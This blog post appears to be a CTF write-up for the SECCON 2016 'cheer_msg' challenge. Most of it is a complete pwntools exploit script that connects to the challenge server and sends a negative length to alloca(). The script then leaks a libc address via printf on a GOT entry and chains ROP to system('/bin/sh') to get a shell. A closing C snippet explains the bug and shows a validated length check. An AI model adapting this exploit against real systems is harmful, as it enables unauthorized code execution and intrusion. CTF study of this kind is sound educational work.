SECCON 2016 cheer_msg

Games/CTF 2016.12.12 20:22

Summary: give alloca() a negative length and wreck the stack.



from pwn import *

context.arch = 'i386'    # 32-bit target

# recvuntil sendline, pack, recv, send

r = remote('cheermsg.pwn.seccon.jp', 30527)
#r = process(['./cheer_msg'])

raw_input('attach')      # pause here to attach a debugger when running locally

# start pwn.
print r.recvuntil('Message Length >> ')
r.sendline('-144')       # negative length handed to alloca()
print r.recvuntil('Name >> ')

# ROP start!
pr     = 0x80487af       # stack-cleanup gadget for printf's single argument
got    = 0x804a00c       # GOT entry of setbuf
printf = 0x8048430       # printf@plt
main   = 0x80485ca
system = 0               # filled in after the leak
binsh  = 0

# stage 1: print the GOT entry to leak a libc address, then return to main
payload  = ''
payload += pack(printf)
payload += pack(pr)
payload += pack(got)
payload += pack(main)
r.sendline(payload)

sleep(1)
leak = r.recv(8192)
print leak.encode('hex')
setbuf = int(leak.split(': \n')[1][:4][::-1].encode('hex'), 16)
print hex(setbuf)

raw_input('leak ok?')

# libc offsets relative to setbuf (remote libc differs from the local one)
system_offset = -0x27810    # server
#system_offset = -0x27800    # local
binsh_offset = +0xf8d2c     # server
#binsh_offset = +0xf9094     # local

# stage2.
#print r.recvuntil('Message Length >> ')   # already consumed by the recv above
r.sendline('-144')
print r.recvuntil('Name >> ')

# ROP start!
system = setbuf + system_offset
binsh = setbuf + binsh_offset
payload  = pack(system)
payload += pack(0)          # dummy return address for system()
payload += pack(binsh)
r.sendline(payload)

# get shell?
r.interactive()
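For reference, here is the unsafe pattern the summary describes and the check that closes it, as an added C example that is not part of the original post or of the challenge binary: a signed length from user input reaching alloca() unchecked, modelled as the stack-pointer arithmetic on i386, beside a validated read path. MAX_MSG_LEN, the sample esp value and all function names are assumptions.

```c
#include <alloca.h>
#include <stdint.h>
#include <stddef.h>
#include <string.h>

/* Upper bound for a message; an assumed value, the challenge's own limit is not on the page. */
#define MAX_MSG_LEN 256

/* Model of what a 32-bit alloca(len) does to the stack pointer when len is a
 * signed value taken straight from user input: it is converted to an unsigned
 * size and subtracted from esp with wrap-around, so a negative len does not
 * fail, it moves esp upward into the caller's frame (the bug in the summary).
 * Real code also rounds the size to the stack alignment, which does not alter
 * a 16-byte multiple such as -144.  Returns the signed change of esp. */
int32_t alloca_esp_delta_i386(int32_t len) {
    uint32_t esp_before = 0xbffff000u;              /* sample esp (assumed) */
    uint32_t esp_after  = esp_before - (uint32_t)len;
    return (int32_t)(esp_after - esp_before);
}

/* The check that stops it: refuse the length before it reaches alloca().
 * Returns the usable length, or -1 when the input must be rejected. */
int32_t checked_msg_len(int32_t len) {
    if (len <= 0 || len > MAX_MSG_LEN)
        return -1;
    return len;
}

/* Hardened read path: the length is validated first and the copy is bounded
 * by the same validated value.  Returns bytes copied, or -1 when refused. */
int32_t read_msg_checked(const char *src, int32_t len, char *dst, size_t dst_cap) {
    int32_t n = checked_msg_len(len);
    if (n < 0 || (size_t)n >= dst_cap)
        return -1;
    char *buf = alloca((size_t)n + 1);             /* n is now in 1..MAX_MSG_LEN */
    memcpy(buf, src, (size_t)n);
    buf[n] = '\0';
    memcpy(dst, buf, (size_t)n + 1);
    return n;
}
```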



Posted by daehee87
